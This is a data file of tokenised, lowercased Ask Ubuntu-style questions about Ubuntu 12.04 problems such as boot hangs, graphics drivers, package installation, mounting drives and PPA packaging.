164376	installing 12.04 on a asus x71sl	i 'm trying to boot a live cd with ubuntu 12.04 on my asus x71sl laptop . i cant boot from usb , so i burned a cd , and changed the boot order everything . after booting the screen goes purple and changes to a black screen with a single blinking white underscore and does n't move on . if i use the cd in another laptop it stay on the screen with the single white underscore for less than a second and goes to the ubuntu screen with the white/orange dots . so what could cause this problem , because the cd does work and my laptop does start to boot the live cd but just stops . so i think the cd and cd drive are fine what else could it be ?
164377	how to check data usage of a usb datacard on ubuntu ?	are there any tools to check data usage of usb datacard on linux ? the way can be done on windows , is it possible on linux also ?
164380	how can i undo the last cd command ?	is there any way to jump back to the previous working directory after doing a cd to a different directory ? my use-case is that i 'm traversing a directory structure for a java project , and i 'm expecting that the current directory has only one sub-directory . so , i type cd and hit tab and enter rather quickly . however , the tab failed , as i mistakenly expected one sub-directory , when in fact there are more . so now , i just executed cd , and am now in my home directory , instead of the java project . is there a way to `` undo '' this cd and jump back to the directory i was in ?
164381	installation of windows xp or 7 guest os is extremely slow within ubuntu 12.04 host os	i 've successfully installed and ran windows xp and windows 7 in kubuntu 10.04x64 . but installation never succeeds in any os beyond 10.04 ; i 've tried kubuntu 11.10x64 , 12.04 x32 and x64 . formatting the virtual drive and copying files always takes extremely long time ( with xp copying 50 % of files takes over 3 hours ; at which point i force quit virtualbox ) . i 'm not really sure how to proceed ; please let me know what terminal outputs to produce .
164388	graphics freezes on acer aspire 5516	i have a problem with graphics on my aspire 5516 . i use default drivers for lan ( atheros ) and video ( ati radion 1200 ) cards . so , graphics freezes when my lan adapter is turn on but the cable is n't connected in ubuntu 11.04-12.04 with uis unity 3d and gnome ( no problem in gnome classic and unity 2d ) . also mouse does n't move too and i ca n't restart compiz from keyboard . i can go to text mode and then turn off adapter and restart compiz . could someone help me with that ? each answer is appreciated . ps . i 'm sorry about my poor english .
164394	how to disable bottom panel/message tray in gnome shell 3.4 ?	running ubuntu 12.04 with gnome shell 3.4 . after enabling bottom panel extension ( to remove annoying message tray/bottom panel/hot-corner at the bottom ; you know what i am talking about ( : ) , still a `` half '' message pop-up after adding usb drive . well , sorry , dont know how to explain it correctly . maybe someone have any clue how to solve this thing and get rid of that ? here is a screenshot :
164396	two monitors causing crash with same nvidia graphics card	okay , well , i 'm mildly surprised i do n't see this question asked yet , as pp as i like to call it ( 12.04 ) boasted support for two monitors . why can i not use two monitors ? my current set-up is kinda sketchy , so that 's probably why . but what part of it is screwed up ? alright . i have an geforce nvidia 9800 that has two output slots , and i have them hooked up to two computer screens of different resolution . i have it working perfectly in windows . it also works well in the ubuntu sign-in screen . however , the problem here lies whenever i sign into my user . i sign in like normal , but the second screen shuts off . when i go to `` displays '' , it recognizes the screen for me and lets me configure it just like in windows . however , whenever i click apply , it crashes my system and i must restart and it comes back without the new settings . yes , i 'm using the correct resolutions and i 'm not mirroring . i believe i 'm also up-to-date on my drivers . what is wrong here ? is this a known problem i 'm unaware of ?
164406	installed 12.04 , have no user interface , only the wallpaper backcground	i recently tried to update my desktop to 12.04- i was actually still using 9.10 , so i 've gone through the update process several times already , and this was the last one . i restarted , and it went to the log-in screen just fine , but when i log in , all i get is a the background image . there are no bars , no dock- i can right-click and do some settings menu stuff , but that is all . how can i fix , if possible ?
164411	i 'm trying to install gdebi.deb in my ubuntu 12.04 and ca n't seem to do it	i 'm trying to install the gdebi.deb package on my computer . i need to do it manually through the terminal , but i have tried the sudo install -i package.deb but says it does n't work because it 's not a directory or something . then i did cd /home/user/downloads/package.deb and when it changed directories i did sudo install -i package.deb but the same thing came up . i 've already downloaded gdebi.deb in my downloads but need to install it through the terminal .
164412	how to hide btrfs devices in nautilus ?	i 've got a btrfs file system consisting of 3 devices and using raid1 . the file system contains one subvolume `` home '' which is defined in the fstab and mounted at `` /home '' . fstab entry looks like this : /dev/sdb3 /home btrfs device=/dev/sdb3 , device=/dev/sdc , device=/dev/sda , compress=lzo , subvol=home 0 0 when i open nautilus in 12.04 , it lists both `` secondary '' btrfs devices ( sdc and sda ) on the left side under `` devices '' . i can actually mount btrfs system once again when clicking on the icons . how do i hide those icons in the nautilus ?
164415	how do i resolve `` was n't able to locate a file for the libpango1.0-0 package '' ?	this message came up while trying to install ( software ) updates the update manager said `` are available for this computer '' . i have no idea what `` the libpango1.0-0 package '' is , nor how it relates to any of the updates ( i 'm a total newbie , having only recently bought , and turned on , a machine pre-loaded with ubuntu 12.04 lts ) .
164418	ubuntu 12.04 does not want boot if external keyboard attached to usb 3	as in the subject , if my external keyboard is attached to my dell vostro 3750 laptop ( via usb 3 ) - ubuntu does not want to boot - i see only black screen . could you please help me ?
164419	does ubuntu have a social client faster than gwibber ?	i just installed ubuntu 12.04 and i began using gwibber for my accounts of twitter and facebook , but it 's so slow .
164423	ca n't see hdd during install 12.04 on lenovo u310	i try to istall ubuntu 12.04 on my lenovo u310 laptop . the problem is here : gparted see my hdd , all is okay . but when i launch installation - there is no partitions to choice . i think it happens , cause u310 has 2 hdds ( normal and ssd ) and may be boot process contains some magic inside ... can anybody help with it ? thanks . update 1 after some experiments i found , that problem is in intel rapid start technology ( irst ) . it uses ssd drive as cached disk , and hdd as accelerated . and both of them work in raid0 . that 's why ubuntu installer ca n't see table partition . so , to fix it , i disabled ( ctrl+i during loading notebook ) acceleration of the 500 gb hard drive and all is fine . i 'm sorry if it copybook maxims , but maybe it helps to someone . love ubuntu : )
164427	invisible launcher icons , asus zenbook ux32vd , ubuntu 12.04	i just got my new asus laptop from the store and wanted to use ubuntu . but after i installed all updates and stuff , the launcher icons went invisible . they still works and text is displaying when i hover them . all the icons are invisible . i 've tried to reinstall unity ( http : //askubuntu.com/questions/131016/how-can-i-remove-and-re-install-unity ) but that does not work . i 've also tried to use those commands with no progress : unity -- reset-icons unity -- reset after a reboot , the launcher is still not rendering the icons properly . the only thing to get it work is to login with ubuntu2 at the login screen , but i 've noticed that by doing this , the computer does not use the gpu , and the graphic drivers are not running . does this means that i need new graphic drivers or something ? because this only happens in fallback mode . any ideas ? i 'm using kernel 3.5.0-4 and the automatic installed drivers from `` additional drivers '' program .
164429	matlab launcher does n't work	i 've installed matlab r2011a on ubuntu12.04 . i 've installed it in a folder i 've created in the home folder . i can run it if i run the code cd directory ./matlab however i want to create a launcher that runs . i 've followed the steps as explained in the guide here , https : //help.ubuntu.com/community/matlab , even tho it 's for ubuntu 10.04 , and the launcher appeared . however when i press it nothing happens . i 'm not sure what i should do next ... any help would be appreciated .
164432	how long does it take for an application update to be approved ?	i published my first application for ubuntu recently , a commercial encryption application costing $ 2.99 . it 's somewhat simple , and consists of one .exe file ( written in c # mono ) and one text file . when i published it the first time , the whole review process took about 4-5 days . however , i discovered a bug and submitted an update to fix it , also changing the title , description , version number and a few other details , it has now been 13 days and i have received no feedback . is this normal ? how long should i expect to wait ? thanks !
164436	clean mounting hfs+ partition after power failure	i have a rather large external harddrive formatted in apple 's hfs+ format , and reformatting it is not an option for me . now that i have a linux server at home , i have turned journalling off on the harddrive and i mount it with read and write access at boot time on my ubuntu box ( 12.04 desktop version , but i use it as a home print/file/media server ) . up to here everything works smoothly . the problems start when some event leads to an unclean unmount , and this happens a lot in a home environment . this can be a power failure , or a cable disconnection , or etc ... . consequently , the hfs+ drive does not mount anymore at boot time and if i try to mount it manually , it gets mounted as read-only . to solve the problem , every single time i have to disconnect the drive , and connect and mount it on my macbook . after a clean unmount the drive can be mounted with no problem on my linux box . is there anyway to skip this connecting-to-osx-box step , i.e. , is there anyway to clean mount an unclean unmounted hfs+ drive with read and write access in ubuntu ? is there a switch that i can use in my fstab to force the mounting ? thanks in advance . mah
164438	update manager fails to download package files	how can i resolve this issue ? thank you ! failed to fetch h ttp : //us.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-gnome_0.9.7.8-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.177 80 ] failed to fetch h ttp : //us.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-plugins-default_0.9.7.8-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.177 80 ] failed to fetch h ttp : //us.archive.ubuntu.com/ubuntu/pool/main/c/compiz/libdecoration0_0.9.7.8-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.177 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-core_0.9.7.8-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.177 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz_0.9.7.8-0ubuntu1_all.deb 404 not found [ ip : 91.189.92.177 80 ]
164443	how to merge a branch in bzr ?	i am a participant in the ubuntu app showdown contest and i got some feedback https : //myapps.developer.ubuntu.com/dev/apps/1183/feedback/ and i want to merge the bzr branch of m. hall to my main branch . how i can do this correctly because i do n't want to cause any problem ... edit : i found this how do i apply the fixes suggested from the app review board to my app ? but i have a problem chris @ chris-aspire-5732z ~/projects/mangar/mangar $ bzr merge lp : ~mhall119/ubuntu-app-reviews/mangar bzr : error : branches have no common ancestor , and no merge base revision was specified .
164446	proprietary drivers required for my lenovo edge 320	sooo ... i have ordered myself a lenovo thinkpad edge 320 . i 'm realy excited about the laptop and about trying ubuntu . i 'm completly new to linux . so i did find out that the laptop is certified for ubuntu 12.04 lts 64-bit , but it says that proprietary drivers for wifi functionality is required . basically i have absolutly no idea what that means , or what i have to do , to make wifi work . thanks a lot !
164457	how can istall installtion jre-7u5-linux-x64 java on ubuntu 12.04 ?	i want to install jre-7u5-linux-x64 on ubuntu 12.04 marwa @ marwa-vostro-1540 : ~ $ sudo apt-get install [ sudo ] password for marwa : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package jre1.7.0_05 e : could n't find any package by regex 'jre1.7.0_05' marwa @ marwa-vostro-1540 : ~ $ sudo gedit etc/apt/sources.list but the gedit is empty , what i can do ? and what is the meaning of : reading package lists ... done` building dependency tree reading state information ... done e : unable to locate package jre1.7.0_05 e : could n't find any package by regex 'jre1.7.0_05'
164460	how can install syntenyminer for visualization of genome alginment ?	i want to install syntenyminer on ubuntu 12.04 marwa @ marwa-vostro-1540 : ~ $ cd desktop/syntenyminer marwa @ marwa-vostro-1540 : ~/desktop/syntenyminer $ `sudo apt-get install syntenminer` [ sudo ] password for marwa : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package syntenminer marwa @ marwa-vostro-1540 : ~/desktop/syntenyminer $ `sudo gedit etc/apt/sources.list` i found the gedit was empty so how can i install it ? ? and what these previous line mean ? ? ? ?
164466	each time i reboot ubuntu 12.4 in my vmware on mac os the share folder are not mounted	i installed the vmwaretools-8.8.4 . the shared folder was working fine . each time i reboot ubuntu 12.4 in my vmware on mac os the share folder are not mounted ? any idea of what is happening ?
164468	how to prevent the handle of a gtkpaned from being moved	how can i prevent the handle of a gtkpaned from being moved ? for instance , i want to lock it according to the status of a gtktogglebutton .
164473	simple image editor ?	i want something similar to `` preview '' in macs . for example : i want an image editor that only does simple adjustments like increase/decrease contrast , saturation , exposure , color tinting ... . rotate , flip vertically , flip horizontally , make black and white , change size or format , crop . thats it . i know gimp can do all those things but its a bit overkill . i just want to right click an image , open it with this magical program i just described , do a few quick adjustments , and then save and exit . nothing really fancy . anyone know of anything like this ? btw i am using ubuntu 12.04 : ) it rocks and i am glad i switched from mac , i just need to replace this one piece of software .
164478	assigning servername to a local ip in apache/ubuntu	i have a apache server running on ubuntu 10.04. i wanted to give the server a name . so i added a name called sdk in /etc/apache/sites-available/sdk with the following virtualhost *:80 > serveradmin webmaster @ localhost servername sdk.sat serveralias *.sdk.sat documentroot /var/www < directory /var/www > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > errorlog /var/log/apache2/error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog /var/log/apache2/access.log combined now , i can access this web address thorught the lan using its ip address 192.168.1.5 . but i want it to be accessed by the server name sdk.sat . how can i do this ?
164482	ethernet connection stopped working	i walked away from my computer for a few hours , restarted for some updates and afterwards the ethernet connection was no longer working .
164488	issues with sound when running program as different user than login-user	i aliased google-chrome and whitelisted myself in sudoers so now when i type sudo chrome it runs sudo -u chromeuser -i google-chrome & . ( for reasons outlined below ) since all other users besides myself have a home directory on ext3 this works very well . the only downside is that chrome , when started as chromeuser , will not play sound . edit : moved question to top for clarity background for anyone who 's interested : i set the home directoy for one of my users to be on an ntfs partiton so that it is accessible from windows . i 'm the only one who uses the computer so i set fuse to allow 777 permissions to that partition . i deleted /home/me and created a symlink in it 's place that points to the ntfs partition ( which is mounted at /shared/home ) . chrome does n't play well with that configuration because it creates various caches under your home directory and ntfs performance could n't keep up with it . i fiddled with a few options to chrome ( -- user-data-dir -- disk-cache-dir ) but i could n't get 100 % of chrome 's open files under my control . so my solution was just run chrome as it 's own user . tldr ; i started a program as another user , does n't seem to want to play sound . is this related to alsa ?
164491	12.04 constant freezing after screen lock ?	i have a laptop with ubuntu desktop 12.04 on it . about 1/4 of the times i open the lid of the laptop , the screen will turn on , i 'll be able to move my mouse around , but clicking/typing is unresponsive . the only way to get out of this is to do a hard restart ( hold power button down ) . then , sometimes ubuntu wo n't load after that , and will tell me that it 's restarting ( see this question ) .
164494	grub load error	when i try installing ubuntu from the try ubuntu off of my usb i get the error `` executing 'grub-install/dev/sdb ' failed '' . i had pclinuxos installed and i was attempting to fully replace it with ubuntu 12.04 i 've seen a lot of other questions similar to this but as far as i 've been able to figure out none of the solutions work for me . when i run sudo fdisk -l in the terminal it shows that dev/sda1 is linux , dev/sda2 is extended , and div/sda5 is linux swap/ solaris then there is a dev/sdb1 that is fat16 sorry i could n't figure out how to insert a screen shot but if needed and you can explain how i can post it .
164495	graphics drivers for ati radeon 5450	i 've been googling everywhere i could think of for the past three days now and i finally just made an account here to ask my question . i 'm a total ubuntu n00b , i 'm converting from windows ( which i know pretty much inside and out ) . i tried to install the fglrx proprietary catalyst 12.6 drivers on my system ( ubuntu 12.04 lts 32 bit ) but every time i do i eventually end up with an unfixable boot error and have to reinstall ubuntu . i 've reinstalled 3 times already . the reason i want the drivers is because i have two monitors , and they only work in mirrored mode without the proprietary drivers for me . i got them to work once without , but my larger monitor only ran in 1024x768 . is there some way to install the drivers that will make them not be so finicky ? i heard there were also open source drivers as well ? how do you install those ? thanks .
164497	mv : can not stat with *	i 've tried this before . i swear i was able to issue this kind of command before : mv /home/user/temp1/* /home/user/temp2 basically , i got this command from here : http : //superuser.com/questions/273254/move-files-and-folders-recursively-in-linux any idea why it 's telling me mv : can not stat `/home/user/temp1/* ' : no such file or directory
164503	problems installing ubuntu via cd	i am fairly new to the whole linux system . i used it very little in college and decided to get back into it 4 years later . i have been trying to get ubuntu lts installed on my old laptop ( about 8 yrs old ) and once the install gui gets to restart and i let the computer do the whole restart it just sits on a black screen if i remove the cd . i have no clue what my hardware specs are anymore , i 've been trying to figure that out for a couple weeks now . all i am working from right now is the fact that it is a sony vaio pcg-grt270 . update : sorry i forgot to mention what i do know about the hw , it has 512 mb of ram , 60 gb hdd and pentium 4 processor , but not sure of the speed .
164507	how can i automate opening and closing groups of applications ?	i 'd like to click a button that launches my group of applications that i need for graphical design . then after a few hours be able to close them and open all my social applications ( empathy , thunderbird , netlog.com , etc ... ) . and sometimes open the group for learning cantonese . my pc is average , so not powerful to load all this well in different workplaces . with unity i even found it better to reduce the workspaces from 4 to 1 . i believe dedicated working like this without distracting applications would help others to become more productive too . i hope somebody can help . should we make a facilitating program for this ?
164515	looking for a decent looking , battery-oriented desktop environment , with transparent panel	i have ubuntu running on my laptop , and ( especially since my laptop specs are a tad bit higher than budget machines ) i need to optimize ubuntu as much as possible to maximize my battery life . i 've seen a couple of battery life oriented desktop environments , but they seem to be on the visual scale of windows 98 or something . i 'm not asking for high-quality 3d effects and graphics , but i would strongly prefer transparent panels and launchers ( or hideable launchers ) . i do n't mind the window-and-start-menu style of some desktop environments . i actually sort of like cinnamon 's approach , but the lack of transparency and a couple of other quirks turned me away from it . and to be quite honest , if i could change the icon size and enable a transparent panel in unity2d i would just stick with that . in summation , i want a desktop environment that offers the following panel transparency and launcher hiding optimized for battery performance minimalistic , non-intrusive icons any suggestions ? edit ; would also prefer an upper panel option , like in unity , that can switch between transparency on the desktop and matching chromium 's upper edge when it is maximized . chromium is pretty much the only window i maximize and the disconnect in some environments like gnome classic is n't pretty .
164518	hard resetting alsa configuration ?	i just made mess with alsa mixer this is why i made this mess . is there any way so that i can reset my sound configuration and at least my system speaker and heafones do n't work at same time . or is there any method from which i can re-install this thing and make my microphone working . with my headfone .
164520	how to check whether a fixed bug reported at launchpad would affect my distro release ?	could you please help me to decide whether this bug affects ubuntu 12.04 ? i found out the information about the indicator-multiload ( which turned out to be the thing i have been missing in my installation of ubuntu 12.04 for toshiba ac100 ) , but then i saw the comment warning about this memory leak bug ( reported at launchpad ) . i 've read the comments there , seen that some fix has been comitted , but i ca n't understand whether this fix got into the repository for ubuntu 12.04 , so that i can install this indiciator without being afraid of this memory leak . what is the quick way to check this ?
164524	how can i help ubuntu as a developer ?	i am intermediate java/python/php developer , but i really would like to help build something for ubuntu for free . how can i do that ?
164528	any netflix alternatives for ubuntu ?	i tried to watch netflix on my ubuntu machine and realized that i wo n't be able to make it work over than in a virtual machine and for me this is not a solution . so , being new to the us , i would like to know if there 's other streaming services allowing the usage of ubuntu by their choice of technology . i would gladly pay for it . thanks
164530	could n't find matching glx visual ( resource temporarily unavailable )	when i execute etracer ( extremetuxracer ) from within a terminal all i get is : '' etracer error : could n't initialize video : could n't find matching glx visual ( resource temporarily unavailable ) '' i have an intel graphics adapter that runs compiz and other 3d games just fine .
164531	multiple wallpapers in gnome-shell	i know this has been asked to death , but i ca n't get it to work . i 'm trying to have multiple wallpapers ( one different wallpaper per workspace ) and i 've done the whole compiz wallpaper plugin set the images and then use advance settings to have file manager handle the destop . and i still only get the 1 wallpaper i have set in system preferences . also it 's worth mentioning that i 'm using gnome-shell , not unity .
164534	get calendar to snap to one screen , rather than overlaying in the middle	i have a problem with lubuntu desktop in that , the calendar on the tray bar when clicking on the current time opens in the centre of the entire desktop spanning the gap between my dual monitors which is really annoying . i can stopgap this by adding a spacer after the current time by a certain amount to offset it - but this leaves a ridiculous gap in the tray bar .
164537	about node controller	i have installed maas , but i am having difficulty in installing node . in the documentation i am having difficulty in how to configure each node for wake on lan and pxe .. how to select pxe boot to first .. also to use isc , your /etc/cobbler/modules.conf should contain , where i should write and how i should write this command in my node . when i configure for node in the installation i select select maas by name or address , after that i put the ip address of my maas server but after it it automatically closes .
164538	why ca n't i install `` ia32-libs '' ( no candidate ) ?	i want to install eagle cadsoft 6.2.0 on ubuntu 11.10 , eagle is 32bit compatible so i need to install ia32-libs but its giving the following error : package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs ' has no installation candidate after using the command sudo apt-cache search ia32 i got this : grub-efi - grand unified bootloader , version 2 ( dummy package ) grub-efi-ia32 - grand unified bootloader , version 2 ( efi-ia32 version ) grub-efi-ia32-bin - grand unified bootloader , version 2 ( efi-ia32 binaries ) lsb-core - linux standard base 4.0 core support package lsb-cxx - linux standard base 4.0 c++ support package lsb-desktop - linux standard base 4.0 desktop support package lsb-graphics - linux standard base 4.0 graphics support package lsb-printing - linux standard base 4.0 printing package elilo - bootloader for systems using efi-based firmware libasm0 - disassembling engine provided to the eresi framework libasm0-dev - disassembling engine provided to the eresi framework lsb-languages - linux standard base 4.0 runtime languages package lsb-multimedia - linux standard base 4.0 multimedia package lsb-qt4 - linux standard base 4.0 qt4 support package refit - graphical boot menu for ia32 and x64 efi systems ia32-libs-multiarch - multi-arch versions of former ia32-libraries microcode.ctl - intel ia32/ia64 cpu microcode utility please help .
164539	how do i sort account names alphabetically in thunderbird ?	i just upgraded to ubuntu 12.04 and thunderbird 13.0.1 . i had 2 accounts earlier in thunderbird : a.. @ i..net s.. @ c..com i also had another account on seamonkey : a.. @ i..com which i imported into thunderbird . now the account order i want is : a.. @ i..com a.. @ i..net s.. @ c..com but it shows : a.. @ i..net s.. @ c..com a.. @ i..com i could n't find any option in thunderbird to sort them as i want . i came across a 3rd party extension but i avoid using such extensions . is there any other way this can be done ?
164544	adding description to files for easy remembering	i have a big amount of files on my laptop , and just the names are not enough for me to remember what each one does . basically , is there any way to add a description to each file without having to open them one by one ? i have one or two source codes being added up daily , so this would be extremely helpful . edit i made a mistake by not being explicit enough , i will try to clear it up : i have multiple code files each for a different problem , and usually in different languages and in multiple versions . my folders hierarchy is pretty neat , but it is a hassle for the cli . a tagging method , with a search capability would be very helpful .
164546	should i use wubi ubuntu 12.04 for my academic studies like writing docs , programming , etc ?	i 've installed ubuntu 12.04 lts as a wubi installation in windows 7 , its running fairly well . will wubi installation cause any problem , will i be able to access any files created in wubi ubuntu in windows 7 ? its said wubi is only for testing out ubuntu but what if i want to use it on a daily basis , i do n't want to do partition or lose any data .
164548	why indicator app not showing when started with root	i 'm testing a feature in psensor that requires root privilege but the app indicator applet did n't show in the unity panel when i launched the app with gksu except when it 's started as normal user . is there any workaround for this ?
164551	how to reset all per-folder view settings in nautilus ?	as per tittle , how do i reset all custom view setting for all folders that i previously set a custom view mode ( icon/list/compact ) for ? i made a change to the default view setting in preferences and i want old folders to use that new setting .
164555	error installing ubuntu , how to remove and install it again	i am having problem in installing ubuntu in my windows 7 . i had installed it earlier using wubi but it got corrupted and now because of it i am not able to install any of the ubuntu version in windows 7 via wubi . someone please help me it is really getting frustrating . this is the error i have got exception : error executing command command=c : \windows\sysnative\bcdedit.exe /create /d ubuntu /application bootsector retval=1 stderr=the boot configuration data store could not be opened . the configuration registry database is corrupt . is there any way which will make my windows boot clean and remove ubuntu entry and let me install again
164567	how to sketch mechanical drawings and pcb of the electronic device ?	i am trying to sketch pcb and mechanical drawings of the electronic device . are there any application which is available for ubuntu 12.04 ? note : application should suggest left-right-up-down arrow
164568	download problem of ubuntu desktop	i was downloading ubuntu desktop and the downloader got stuck on amd64.tar.xz file . i closed the installation and the restarted it , it uninstalled the previous one but then again the downloader is stuck on the same file . os is win7 home premium . how do i come out of this situation ?
164570	broken schema 'org.gtk.settings.filechooser '	since a few weeks ( after a distribution upgrade ) , about every program with a graphical user interfaces crashes at some point with the same error : glib-gio-error ** : settings schema 'org.gtk.settings.filechooser ' does not contain a key named 'last-folder-uri' it happens about every time a file open dialog shows up , but also when the network manager asks for a wifi password . ( which means i ca n't open files in any gtk application and only connect to open wireless networks . ) /usr/share/glib-2.0/schemas/org.gtk.settings.filechooser.gschema.xml does contain < key name='last-folder-uri ' ... etc . running glib-compile-schemas does n't seem to help . any ideas ? edit : it 's not just for one user . if i log in as a guest ( 'guest session ' ) , the same happens . edit 2 : $ dpkg -s libgtk-3-common | grep version version : 3.4.2-0ubuntu0.3 contents of /usr/share/glib-2.0/schemas/org.gtk.settings.filechooser.gschema.xml : https : //gist.github.com/f90a230bf6077cbaa967
164574	ragged and thin font in all users except my account	there is no problem in my main user account , but in other is system font very ugly . ragged and thin . i use default ubuntu - font - family . the same situation is in lightdm . i tried delete .fontconfig folder , unity -- reset , ubuntu tweak and nothing helped . thanks p. screenshot of broken font : http : //i.minus.com/ibnxpjnsouscbj.png scrennshot of normal font : http : //i.minus.com/iqzxy2emaitcy.png
164586	environment variables - where are they stored by linux , how do i change them and is it safe to do so ?	i am trying to configure a build from source an old version of gcc on my dev machine . the documentation highlight several environment variables that need to be changed in order to do this . i was wondering how to do this and also where linux stores them and if a system restart is required for any changes to be registered ? ?
164587	how can you unhold ( remove a hold on ) a package ?	i used synaptic to lock the version of pidgin-data - how can i change the status from hold back to normal , so that it gets upgraded properly ? the pinninghowto says that doing an apt-get install packagename should remove the hold , but running dpkg -l | grep ^h still shows it as held : hi pidgin-data 1:2.10.6-0ubuntu1+pidgin1.12.04 multi-protocol instant messaging client - data files how can i properly undo the hold status ?
164603	my ubuntu-app-showdown-participation-details.txt was updated by someone and contains an other name and the false ppa	for the ubuntu app showdown i created a ubuntu-app-showdown-participation-details.txt-file and uploaded it correctly on `` my apps '' to participate the ubuntu app showdown - contest . now i saw , that my .txt-file was changed by someone , because there is a false name and ppa . the txt-file contains an other participant which is listed in app # 122 with the app-name `` variety '' on swhodown apps . the correct app should be my app # 38 `` interest calculation '' for my app you can find on my app link . i posted this in the feedback-section but i am not sure if somewone reads this becausei got no answers of my other questions , i posted there more than one week ago . i do n't want to be rejected from the contest , because someone has updated my .txt-file . the correct content for the .txt-file is also listed in the feedback-section of my app . this is the copy of original text i uploaded , when i created the app-entry in the developer portal .
164605	how can i stop the unity bar from causing cursor delay between two monitors ?	if i have two monitors , side by side , then the unity bar will interfere with mouse movement . i set the unity bar to only display if i move the mouse to the top left corner of the screen , but the mouse still pauses momentarily when i move the mouse from the right display to the left display . the place it pauses , is exactly on the left border of the right screen .
164606	how can i make all desktop menus dissapear ?	in the past ( before unity ) , it was possible to use my entire desktop without any menus whatsoever . i used a quick launch app to run my programs and used some of the nice compiz windows managers to cycle between my windows . now i 'm kinda stuck with the menu at the top and unity at the left ( which i can autohide , but this messes things up with two monitors side by side ) . there are hacks and utilities to make them disappear , but what would be the least intrusive way ? i ca n't afford for my ubuntu to become unstable .
164612	does the alternate installer ( 12.04 ) allow dual booting in windows ( resizing partition ) ?	i can not use the desktop 12.04 cd on a laptop with windows . i can use the alternate cd ( 12.04 ) on this computer , but i am unsure if the alternate cd allows re-partioning the hard disk allowing a dual boot with existing windows partition . does the alternate installer ( 12.04 ) allow to create a dual boot with windows ( resizing partition ) ?
164615	ubuntu 12.04 halt/poweroff trouble	i successfully installed ubuntu server 12.04 32-bit on a hp proliant microserver , everything works perfectly but when i try to turn off the machine with the command halt or poweroff hangs after disabling everything and stays on the screen system halted and can no longer interact or reach it from network , the only thing i can do is shut it down forcibly with the power button . initially even reboot did not work but after editing the /etc/default/halt file , it worked : init_halt=poweroff i followed some forum where advised to modify /etc/default/grub , by changing the line : grub_cmdline_linux_default= '' '' to grub_cmdline_linux_default= '' quiet splash acpi=force '' but it did not work for me . i tried to do the opposite and disable acpi in the bios and grub setting : grub_cmdline_linux_default = `` quiet splash acpi=off noacpi '' the same . i repeat there is no graphical environment . have someone found other solutions ?
164616	can i use the ubuntu logo on t-shirts produced non-comercially ?	is it permited to use ( print ) ubuntu logo on a `` ubuntu users group '' t-shirt which is not sold public but to the group members ? ( i read this question . )
164617	what 's the folk-lore on troubleshooting lightdm and other display manager problems ?	i just spent a number of hours in trying to make my 12.04 boot again , after it put itself in a strange hang in splash screen . after many trials and errors involving false leads such as nvidia-common driver hanging after `` checking battery state '' failure in mountall failure to mount the swap due to encrypted home directory and dealing with grub plymouth and others , i traced the problem to being related to lightdm . i changed to gdm , and the problem was solved . could i have saved this fiver hours waste of time by using a log file , or any other information that could help in finding the difficulty that lightdm was experiencing ?
164618	how to disable auto open window in pidgin ?	when my friends write me a new conversation in pidgin open immediatly a new window . can i disable show a new window ? i want only a notify in tray ... tnx
164621	how do i add a binary file to my existing ppa package	adding modified or new text files to my ppa package is simple enough : step 1 : apt-get source [ foo-package ] cd [ foo-package ] step 2 : add or modify new text files containing the changes step 3 - update the changelog : dch -i step 4 - create a patch dpkg-source -- commit step 5 - create a source package debuild -s step 6 - upload to launchpad cd .. dput [ myppa ] / [ foo_source.changes ] however , i now need to add a new icon file ( a .png file ) to the existing package . so at step 2 - just copied into the [ foo-package ] at step 4 - i get the following errors : dpkg-source : error : can not represent change to foo-package/foo-icon.png : binary file contents changed dpkg-source : error : unrepresentable changes to source if i attempt to move to step 5 i get the following additional errors to the above : dpkg-source : error : add foo-package/foo-icon.png in debian/source/include-binaries if you want to store the modified binary in the debian tar-ball ... dpkg-buildpackage -rfakeroot -d -us -uc -s failed any ideas how do i add a binary icon file to my existing ppa package ? more information by running : debuild -s -- source-option= -- include-binaries this then allows for the source package to be built and step 6 is possible . however this isnt really the answer - because i subsequently can not then make further code changes ( step 2 ) because i 'm still getting the same errors . it doesnt look like i can do dpkg-source -- commit -- source-option= -- include-binaries because this just gives errors : dpkg-source -- commit -- source-option= -- include-binaries dpkg-source : warning : -- source-option= -- include-binaries is not a valid option for dpkg : :source : :package : :v3 : :quilt dpkg-source : error : can not represent change to foo-package/foo-icon.png : binary file contents changed dpkg-source : error : unrepresentable changes to source
164624	having trouble updating nvidia drivers	i 've just bought a new laptop and am trying to install ubuntu on it . this is the first time i 'm installing linux on my own machine ( i 've used it on machines at work and school before , but i 've never had to set it up ) . the laptop is an msi x460dx , with an nvidia geforce gt 630m graphics card . i am currently installing ubuntu on the machine for the third time tonight because trying to update the nvidia drivers has led to so much trouble i found it was easier to just reinstall . i 've tried numerous different methods of updating the nvidia drivers , including downloading the shell script from their website and running it as well as running a bunch of apt-get commands from the command line ( as instructed by numerous online websites ) . everytime i install the new drivers , then restart the machine , it boots up at a 640x480 resolution , with no other resolutions available as options . i go to the nvidia xserver settings , and it says that i 'm not currently running an xserver . no matter what i do i ca n't get past that error , and i 've tried all of the solutions i could find on google . i 've been working on this for 6 hours at this point . if there is any information you need to be able to help me , i 'll do my best to provide it . update : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 0de9 ( rev a1 )
164626	why usb sticks automatically mounted only under root ?	i 've just installed ubuntu 12.04 and updated all the packages . if i connect a usb stick to the pc it is not mounted automatically , if i run , say , mount -t vfat /dev/sdc1 /media/usb_stick i get permission denied result . so the command returns a successful result only under sudo . i 'm the only user of the pc . what 's is wrong ? with former versions of ubuntu it was fine .
